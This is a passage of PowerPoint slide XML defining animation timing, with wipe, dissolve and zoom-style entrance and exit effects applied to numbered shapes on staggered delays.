                                          <p:spTgt spid="855"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="85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854"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="854"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="854"/>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 presetID="22" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="853"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="853"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="851"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="851"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="852"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="852"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetClass="exit" nodeType="afterEffect" presetID="9" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect filter="dissolve" transition="out">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="853"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="853"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="855"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="855"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="855"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="854"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="854"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="85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8" presetID="22" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="873"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="873"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="876"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="876"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="845"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="845"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="845"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="840"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="840"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="840"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="860"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="860"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="63" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="64" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="14" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="861"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="15" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="862"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="862"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="71" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="72" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="73" presetClass="entr" nodeType="clickEffect" presetSubtype="16" presetID="23" grpId="16" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="866"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="866"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="866"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="77" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="78" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="17" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="867"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="867"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="867"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="82" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83" presetClass="entr" nodeType="afterEffect" presetSubtype="4" presetID="22" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="84" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="865"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(down)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="865"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="86" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="87" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="19" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="863"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="863"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="90" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="91" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="20" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="864"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
